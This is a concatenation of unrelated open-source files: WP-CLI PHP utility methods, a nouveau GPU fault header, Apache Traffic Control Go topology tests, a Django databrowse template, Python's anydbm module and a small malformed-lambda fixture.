*
* @param array $args The list of positional arguments.
* @param int $index At which position to check for the value.
*
* @return string
*/
public static function get_value_from_arg_or_stdin( $args, $index ) {
if ( isset( $args[ $index ] ) ) {
$raw_value = $args[ $index ];
} else {
// We don't use file_get_contents() here because it doesn't handle
// Ctrl-D properly, when typing in the value interactively.
$raw_value = '';
while ( ( $line = fgets( STDIN ) ) !== false ) {
$raw_value .= $line;
}
}
return $raw_value;
}
/**
* Read a value, from various formats.
*
* @access public
* @category Input
*
 * @param mixed $raw_value Raw value to interpret (decoded as JSON when `--format=json`).
* @param array $assoc_args
*/
public static function read_value( $raw_value, $assoc_args = array() ) {
if ( \WP_CLI\Utils\get_flag_value( $assoc_args, 'format' ) === 'json' ) {
$value = json_decode( $raw_value, true );
if ( null === $value ) {
WP_CLI::error( sprintf( 'Invalid JSON: %s', $raw_value ) );
}
} else {
$value = $raw_value;
}
return $value;
}
/**
* Display a value, in various formats
*
* @param mixed $value Value to display.
* @param array $assoc_args Arguments passed to the command, determining format.
*/
public static function print_value( $value, $assoc_args = array() ) {
if ( \WP_CLI\Utils\get_flag_value( $assoc_args, 'format' ) === 'json' ) {
$value = json_encode( $value );
} elseif ( \WP_CLI\Utils\get_flag_value( $assoc_args, 'format' ) === 'yaml' ) {
$value = Spyc::YAMLDump( $value, 2, 0 );
} elseif ( is_array( $value ) || is_object( $value ) ) {
$value = var_export( $value );
}
echo $value . "\n";
}
/**
* Convert a wp_error into a string
*
* @param mixed $errors
* @return string
*/
public static function error_to_string( $errors ) {
if ( is_string( $errors ) ) {
return $errors;
}
if ( is_object( $errors ) && is_a( $errors, 'WP_Error' ) ) {
foreach ( $errors->get_error_messages() as $message ) {
if ( $errors->get_error_data() ) {
return $message . ' ' . json_encode( $errors->get_error_data() );
} else {
return $message;
}
}
}
}
/**
* Launch an arbitrary external process that takes over I/O.
*
* ```
* # `wp core download` falls back to the `tar` binary when PharData isn't available
* if ( ! class_exists( 'PharData' ) ) {
* $cmd = "tar xz --strip-components=1 --directory=%s -f $tarball";
* WP_CLI::launch( Utils\esc_cmd( $cmd, $dest ) );
* return;
* }
* ```
*
* @access public
* @category Execution
*
* @param string $command External process to launch.
* @param boolean $exit_on_error Whether to exit if the command returns an elevated return code.
* @param boolean $return_detailed Whether to return an exit status (default) or detailed execution results.
* @return int|ProcessRun The command exit status, or a ProcessRun object for full details.
*/
public static function launch( $command, $exit_on_error = true, $return_detailed = false ) {
$proc = Process::create( $command );
$results = $proc->run();
if ( -1 == $results->return_code ) {
self::warning( "Spawned process returned exit code {$results->return_code}, which could be caused by a custom compiled version of PHP that uses the --enable-sigchild option." );
}
if ( $results->return_code && $exit_on_error )
exit( $results->return_code );
if ( $return_detailed ) {
return $results;
} else {
return $results->return_code;
}
}
/**
* Run a WP-CLI command in a new process reusing the current runtime arguments.
*
* Note: While this command does persist a limited set of runtime arguments,
* it *does not* persist environment variables. Practically speaking, WP-CLI
* packages won't be loaded when using WP_CLI::launch_self() because the
* launched process doesn't have access to the current process $HOME.
*
* @access public
* @category Execution
*
* @param string $command WP-CLI command to call.
* @param array $args Positional arguments to include when calling the command.
* @param array $assoc_args Associative arguments to include when calling the command.
* @param bool $exit_on_error Whether to exit if the command returns an elevated return code.
* @param bool $return_detailed Whether to return an exit status (default) or detailed execution results.
* @param array $runtime_args Override one or more global args (path,url,user,allow-root)
* @return int|ProcessRun The command exit status, or a ProcessRun instance
*/
public static function launch_self( $command, $args = array(), $assoc_args = array(), $exit_on_error = true, $return_detailed = false, $runtime_args = array() ) {
$reused_runtime_args = array(
'path',
'url',
'user',
'allow-root',
);
foreach ( $reused_runtime_args as $key ) {
if ( isset( $runtime_args[ $key ] ) ) {
$assoc_args[ $key ] = $runtime_args[ $key ];
} else if ( $value = self::get_runner()->config[ $key ] )
$assoc_args[ $key ] = $value;
}
$php_bin = self::get_php_binary();
$script_path = $GLOBALS['argv'][0];
if ( getenv( 'WP_CLI_CONFIG_PATH' ) ) {
$config_path = getenv( 'WP_CLI_CONFIG_PATH' );
} else {
$config_path = getenv( 'HOME' ) . '/.wp-cli/config.yml';
}
$config_path = escapeshellarg( $config_path );
$args = implode( ' ', array_map( 'escapeshellarg', $args ) );
$assoc_args = \WP_CLI\Utils\assoc_args_to_str( $assoc_args );
$full_command = "WP_CLI_CONFIG_PATH={$config_path} {$php_bin} {$script_path} {$command} {$args} {$assoc_args}";
return self::launch( $full_command, $exit_on_error, $return_detailed );
}
/**
* Get the path to the PHP binary used when executing WP-CLI.
*
* Environment values permit specific binaries to be indicated.
*
* @access public
* @category System
*
* @return string
*/
public static function get_php_binary() {
if ( defined( 'PHP_BINARY' ) )
return PHP_BINARY;
if ( getenv( 'WP_CLI_PHP_USED' ) )
return getenv( 'WP_CLI_PHP_USED' );
if ( getenv( 'WP_CLI_PHP' ) )
return getenv( 'WP_CLI_PHP' );
return 'php';
}
/**
* Get values of global configuration parameters.
*
* Provides access to `--path=<path>`, `--url=<url>`, and other values of
* the [global configuration parameters](https://wp-cli.org/config/).
*
* ```
* WP_CLI::log( 'The --url=<url> value is: ' . WP_CLI::get_config( 'url' ) );
* ```
*
* @access public
* @category Input
*
* @param string $key Get value for a specific global configuration parameter.
* @return mixed
*/
public static function get_config( $key = null ) {
if ( null === $key ) {
return self::get_runner()->config;
}
if ( !isset( self::get_runner()->config[ $key ] ) ) {
self::warning( "Unknown config option '$key'." );
return null;
}
return self::get_runner()->config[ $key ];
}
/**
* Run a given command within the current process using the same global
* parameters.
*
* To run a command using a new process with the same global parameters,
* use WP_CLI::launch_self(). To run a command using a new process with
* different global parameters, use WP_CLI::launch().
*
* ```
* ob_start();
* WP_CLI::run_command( array( 'cli', 'cmd-dump' ) );
* $ret = ob_get_clean();
* ```
*
* @access public
* @category Execution
*
* @param array $args Positional arguments including command name.
* @param array $assoc_args
*/
	public static function run_command( $args, $assoc_args = array() ) {
		// Dispatch in-process via the runner; shares the current global state
		// (contrast with launch_self(), which spawns a new process).
		self::get_runner()->run_command( $args, $assoc_args );
	}
// DEPRECATED STUFF
	// Deprecated no-op kept for backward compatibility; emits a warning only.
	public static function add_man_dir() {
		trigger_error( 'WP_CLI::add_man_dir() is deprecated. Add docs inline.', E_USER_WARNING );
	}
// back-compat
	// Back-compat helper: raw write to STDOUT, bypassing the logger entirely.
	public static function out( $str ) {
		fwrite( STDOUT, $str );
	}
// back-compat
	// Back-compat shim: warns about the deprecated camelCase name, then
	// forwards to the current add_command() API.
	public static function addCommand( $name, $class ) {
		trigger_error( sprintf( 'wp %s: %s is deprecated. use WP_CLI::add_command() instead.',
			$name, __FUNCTION__ ), E_USER_WARNING );
		self::add_command( $name, $class );
	}
}
| {
"pile_set_name": "Github"
} |
#ifndef __NVKM_FAULT_H__
#define __NVKM_FAULT_H__
#include <core/subdev.h>
#include <core/notify.h>
/* Per-device MMU fault subdev state. */
struct nvkm_fault {
	const struct nvkm_fault_func *func;	/* per-chipset hooks (see *_fault_new() below) */
	struct nvkm_subdev subdev;
	struct nvkm_fault_buffer *buffer[2];	/* fault buffers; only buffer_nr entries valid */
	int buffer_nr;
	struct nvkm_event event;		/* fault notification event source */
	struct nvkm_notify nrpfb;
	struct nvkm_device_oclass user;		/* user-visible object class */
};
/* Decoded contents of a single MMU fault record. */
struct nvkm_fault_data {
	u64 addr;	/* faulting address */
	u64 inst;	/* instance block address */
	u64 time;	/* fault timestamp */
	u8 engine;	/* faulting engine ID */
	u8 valid;	/* non-zero if the record is valid */
	u8 gpc;		/* GPC/hub routing information */
	u8 hub;
	u8 access;	/* access type of the faulting request */
	u8 client;	/* client within the engine */
	u8 reason;	/* fault reason code */
};
/* Chipset-specific constructors for the fault subdev. */
int gp100_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
int gp10b_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
int gv100_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
int tu102_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
#endif
| {
"pile_set_name": "Github"
} |
package v3
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import (
"fmt"
"github.com/apache/trafficcontrol/lib/go-tc"
"reflect"
"strings"
"testing"
)
// topologyTestCase couples a human-readable description with the topology
// under test, for use in table-driven validation tests below.
type topologyTestCase struct {
	testCaseDescription string
	tc.Topology
}
// TestTopologies provisions the prerequisite objects (types, cache groups,
// topologies) and then runs the topology test suite against them.
func TestTopologies(t *testing.T) {
	WithObjs(t, []TCObj{Types, CacheGroups, Topologies}, func() {
		UpdateTestTopologies(t)
		ValidationTestTopologies(t)
		EdgeParentOfEdgeSucceedsWithWarning(t)
	})
}
func CreateTestTopologies(t *testing.T) {
var (
postResponse *tc.TopologyResponse
err error
)
for _, topology := range testData.Topologies {
if postResponse, _, err = TOSession.CreateTopology(topology); err != nil {
t.Fatalf("could not CREATE topology: %v", err)
}
postResponse.Response.LastUpdated = nil
if !reflect.DeepEqual(topology, postResponse.Response) {
t.Fatalf("Topology in response should be the same as the one POSTed. expected: %v\nactual: %v", topology, postResponse.Response)
}
t.Log("Response: ", postResponse)
}
}
// EdgeParentOfEdgeSucceedsWithWarning creates a topology in which an edge
// cache group parents another edge. The POST must succeed (it is technically
// valid), but the API is expected to attach a warning-level alert.
func EdgeParentOfEdgeSucceedsWithWarning(t *testing.T) {
	testCase := topologyTestCase{testCaseDescription: "an edge parenting a mid", Topology: tc.Topology{
		Name:        "edge-parent-of-edge",
		Description: "An edge is a parent, which is technically valid, but we will warn the user in case it was a mistake",
		Nodes: []tc.TopologyNode{
			{Cachegroup: "cachegroup1", Parents: []int{1}},
			{Cachegroup: "cachegroup2", Parents: []int{}},
		}}}
	response, _, err := TOSession.CreateTopology(testCase.Topology)
	if err != nil {
		// Report the actual error; the previous message misleadingly said "actual: nil".
		t.Fatalf("expected POST with %v to succeed, actual error: %v", testCase.testCaseDescription, err)
	}
	containsWarning := false
	for _, alert := range response.Alerts.Alerts {
		if alert.Level == "warning" {
			containsWarning = true
		}
	}
	if !containsWarning {
		t.Fatalf("expected a warning-level alert message in the response, actual: %v", response.Alerts)
	}
	// Clean up so later tests don't collide with this topology.
	delResp, _, err := TOSession.DeleteTopology(testCase.Topology.Name)
	if err != nil {
		t.Fatalf("cannot DELETE topology: %v - %v", err, delResp)
	}
}
// ValidationTestTopologies POSTs a series of intentionally invalid topologies
// and verifies each one is rejected with a 400-level status code.
func ValidationTestTopologies(t *testing.T) {
	invalidTopologyTestCases := []topologyTestCase{
		{testCaseDescription: "no nodes", Topology: tc.Topology{Name: "empty-top", Description: "Invalid because there are no nodes", Nodes: []tc.TopologyNode{}}},
		{testCaseDescription: "a node listing itself as a parent", Topology: tc.Topology{Name: "self-parent", Description: "Invalid because a node lists itself as a parent", Nodes: []tc.TopologyNode{
			{Cachegroup: "cachegroup1", Parents: []int{1}},
			{Cachegroup: "parentCachegroup", Parents: []int{1}},
		}}},
		// Merged a copy-paste defect: an empty placeholder entry labeled
		// "duplicate parents" plus a mislabeled "too many parents" entry that
		// actually held the duplicate-parents topology.
		{testCaseDescription: "duplicate parents", Topology: tc.Topology{Name: "duplicate-parents", Description: "Invalid because a node lists the same parent twice", Nodes: []tc.TopologyNode{
			{Cachegroup: "cachegroup1", Parents: []int{1, 1}},
			{Cachegroup: "parentCachegroup", Parents: []int{}},
		}}},
		{testCaseDescription: "too many parents", Topology: tc.Topology{Name: "too-many-parents", Description: "Invalid because a node has more than 2 parents", Nodes: []tc.TopologyNode{
			{Cachegroup: "parentCachegroup", Parents: []int{}},
			{Cachegroup: "secondaryCachegroup", Parents: []int{}},
			{Cachegroup: "parentCachegroup2", Parents: []int{}},
			{Cachegroup: "cachegroup1", Parents: []int{0, 1, 2}},
		}}},
		{testCaseDescription: "an edge parenting a mid", Topology: tc.Topology{Name: "edge-parent-of-mid", Description: "Invalid because an edge is a parent of a mid", Nodes: []tc.TopologyNode{
			{Cachegroup: "cachegroup1", Parents: []int{1}},
			{Cachegroup: "parentCachegroup", Parents: []int{2}},
			{Cachegroup: "cachegroup2", Parents: []int{}},
		}}},
		{testCaseDescription: "a leaf mid", Topology: tc.Topology{Name: "leaf-mid", Description: "Invalid because a mid is a leaf node", Nodes: []tc.TopologyNode{
			{Cachegroup: "parentCachegroup", Parents: []int{1}},
			{Cachegroup: "secondaryCachegroup", Parents: []int{}},
		}}},
		{testCaseDescription: "cyclical nodes", Topology: tc.Topology{Name: "cyclical-nodes", Description: "Invalid because it contains cycles", Nodes: []tc.TopologyNode{
			{Cachegroup: "cachegroup1", Parents: []int{1, 2}},
			{Cachegroup: "parentCachegroup", Parents: []int{2}},
			{Cachegroup: "secondaryCachegroup", Parents: []int{1}},
		}}},
		{testCaseDescription: "a cycle across topologies", Topology: tc.Topology{Name: "cycle-with-4-tier-topology", Description: `Invalid because it contains a cycle when combined with the "4-tiers" topology`, Nodes: []tc.TopologyNode{
			{Cachegroup: "parentCachegroup", Parents: []int{1}},
			{Cachegroup: "parentCachegroup2", Parents: []int{}},
			{Cachegroup: "cachegroup1", Parents: []int{0}},
		}}},
		{testCaseDescription: "a cycle across cache groups", Topology: tc.Topology{Name: "cycle-with-non-topology-cachegroups", Description: "Invalid because it contains a cycle when combined with a topology constructed from cache group parentage", Nodes: []tc.TopologyNode{
			{Cachegroup: "edge-parent1", Parents: []int{1}},
			{Cachegroup: "has-edge-parent1", Parents: []int{}},
		}}},
		{testCaseDescription: "a nonexistent cache group", Topology: tc.Topology{Name: "nonexistent-cg", Description: "Invalid because it references a cache group that does not exist", Nodes: []tc.TopologyNode{
			{Cachegroup: "legitcachegroup", Parents: []int{0}},
		}}},
		{testCaseDescription: "an out-of-bounds parent index", Topology: tc.Topology{Name: "oob-parent", Description: "Invalid because it contains an out-of-bounds parent", Nodes: []tc.TopologyNode{
			{Cachegroup: "cachegroup1", Parents: []int{7}},
		}}},
	}
	for _, testCase := range invalidTopologyTestCases {
		_, reqInf, err := TOSession.CreateTopology(testCase.Topology)
		if err == nil {
			t.Fatalf("expected POST with %v to return an error, actual: nil", testCase.testCaseDescription)
		}
		// statusCode is only needed within this iteration; keep it loop-scoped.
		statusCode := reqInf.StatusCode
		if statusCode < 400 || statusCode >= 500 {
			t.Fatalf("Expected a 400-level status code for topology %s but got %d", testCase.Topology.Name, statusCode)
		}
	}
}
// updateSingleTopology PUTs the given topology and confirms the server's
// response matches it, ignoring the server-set LastUpdated timestamp.
func updateSingleTopology(topology tc.Topology) error {
	updateResponse, _, err := TOSession.UpdateTopology(topology.Name, topology)
	if err != nil {
		return fmt.Errorf("cannot PUT topology: %v - %v", err, updateResponse)
	}
	updateResponse.Response.LastUpdated = nil
	if reflect.DeepEqual(topology, updateResponse.Response) {
		return nil
	}
	return fmt.Errorf("Topologies should be equal after updating. expected: %v\nactual: %v", topology, updateResponse.Response)
}
// UpdateTestTopologies overwrites each topology fixture with the contents of
// the next fixture (names preserved, since names cannot be updated), then
// reverts every topology back to its original definition.
func UpdateTestTopologies(t *testing.T) {
	topologiesCount := len(testData.Topologies)
	for index := range testData.Topologies {
		topology := testData.Topologies[(index+1)%topologiesCount]
		topology.Name = testData.Topologies[index].Name // We cannot update a topology's name
		if err := updateSingleTopology(topology); err != nil {
			// t.Fatal instead of t.Fatalf(err.Error()): the error text is not
			// a format string, and a literal '%' in it would be misinterpreted.
			t.Fatal(err)
		}
	}
	// Revert test topologies
	for _, topology := range testData.Topologies {
		if err := updateSingleTopology(topology); err != nil {
			t.Fatal(err)
		}
	}
}
// DeleteTestTopologies deletes every topology fixture, verifies the deletion
// is recorded in the audit log, and confirms the topology can no longer be
// retrieved.
func DeleteTestTopologies(t *testing.T) {
	for _, top := range testData.Topologies {
		delResp, _, err := TOSession.DeleteTopology(top.Name)
		if err != nil {
			t.Fatalf("cannot DELETE topology: %v - %v", err, delResp)
		}
		deleteLog, _, err := TOSession.GetLogsByLimit(1)
		if err != nil {
			// Include the underlying error (previously discarded).
			t.Fatalf("unable to get latest audit log entry: %v", err)
		}
		if len(deleteLog) != 1 {
			t.Fatalf("log entry length - expected: 1, actual: %d", len(deleteLog))
		}
		if !strings.Contains(*deleteLog[0].Message, top.Name) {
			t.Errorf("topology deletion audit log entry - expected: message containing topology name '%s', actual: %s", top.Name, *deleteLog[0].Message)
		}
		topology, _, err := TOSession.GetTopology(top.Name)
		if err == nil {
			t.Fatalf("expected error trying to GET deleted topology: %s, actual: nil", top.Name)
		}
		if topology != nil {
			t.Fatalf("expected nil trying to GET deleted topology: %s, actual: non-nil", top.Name)
		}
	}
}
| {
"pile_set_name": "Github"
} |
{% extends "databrowse/base_site.html" %}
{# Databrowse list view: all values of one field for a model, each linking to the objects carrying that value. #}
{% block title %}{{ model.verbose_name_plural|capfirst|escape }} by {{ field.field.verbose_name|escape }}{% endblock %}
{% block content %}
{# Breadcrumb trail: Home / model list / field index / this field. #}
<div id="breadcrumbs"><a href="{{ root_url }}">Home</a> / <a href="{{ model.url }}">{{ model.verbose_name_plural|capfirst }}</a> / <a href="../">Fields</a> / By {{ field.field.verbose_name|escape }}</div>
<h1>{{ model.verbose_name_plural|capfirst|escape }} by {{ field.field.verbose_name|escape }}</h1>
<ul class="objectlist">
{% for object in object_list %}
{# iriencode keeps non-ASCII field values usable in the href. #}
<li class="{% cycle 'odd' 'even' %}"><a href="{{ object|iriencode }}/">{{ object|escape }}</a></li>
{% endfor %}
</ul>
{% endblock %}
| {
"pile_set_name": "Github"
} |
"""Generic interface to all dbm clones.
Instead of
import dbm
d = dbm.open(file, 'w', 0666)
use
import anydbm
d = anydbm.open(file, 'w')
The returned object is a dbhash, gdbm, dbm or dumbdbm object,
dependent on the type of database being opened (determined by whichdb
module) in the case of an existing dbm. If the dbm does not exist and
the create or new flag ('c' or 'n') was specified, the dbm type will
be determined by the availability of the modules (tested in the above
order).
It has the following interface (key and data are strings):
d[key] = data # store data at key (may override data at
# existing key)
data = d[key] # retrieve data at key (raise KeyError if no
# such key)
del d[key] # delete data stored at key (raises KeyError
# if no such key)
flag = key in d # true if the key exists
list = d.keys() # return a list of all existing keys (slow!)
Future versions may change the order in which implementations are
tested for existence, and add interfaces to other dbm-like
implementations.
"""
class error(Exception):
    """Generic anydbm error; rebound below to a tuple of all clone errors."""
    pass
# Candidate dbm implementations, tried in order of preference.
_names = ['dbhash', 'gdbm', 'dbm', 'dumbdbm']
# Error classes collected from every importable clone (seeded with our own).
_errors = [error]
# First importable module; used as the backend when creating a new database.
_defaultmod = None
for _name in _names:
    try:
        _mod = __import__(_name)
    except ImportError:
        # Clone not built/installed on this platform; skip it.
        continue
    if not _defaultmod:
        _defaultmod = _mod
    _errors.append(_mod.error)
if not _defaultmod:
    raise ImportError, "no dbm clone found; tried %s" % _names
# Rebind `error` to a tuple so `except anydbm.error` catches any clone's error.
error = tuple(_errors)
def open(file, flag='r', mode=0666):
    """Open or create database at path given by *file*.

    Optional argument *flag* can be 'r' (default) for read-only access, 'w'
    for read-write access of an existing database, 'c' for read-write access
    to a new or existing database, and 'n' for read-write access to a new
    database.

    Note: 'r' and 'w' fail if the database doesn't exist; 'c' creates it
    only if it doesn't exist; and 'n' always creates a new database.
    """
    # guess the type of an existing database
    from whichdb import whichdb
    result=whichdb(file)
    if result is None:
        # db doesn't exist
        if 'c' in flag or 'n' in flag:
            # file doesn't exist and the new
            # flag was used so use default type
            mod = _defaultmod
        else:
            raise error, "need 'c' or 'n' flag to open new db"
    elif result == "":
        # db type cannot be determined
        raise error, "db type could not be determined"
    else:
        # Delegate to the module whichdb identified (e.g. 'dbhash', 'gdbm').
        mod = __import__(result)
    return mod.open(file, flag, mode)
| {
"pile_set_name": "Github"
} |
lambda
lambda x, y
lambda x 1
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.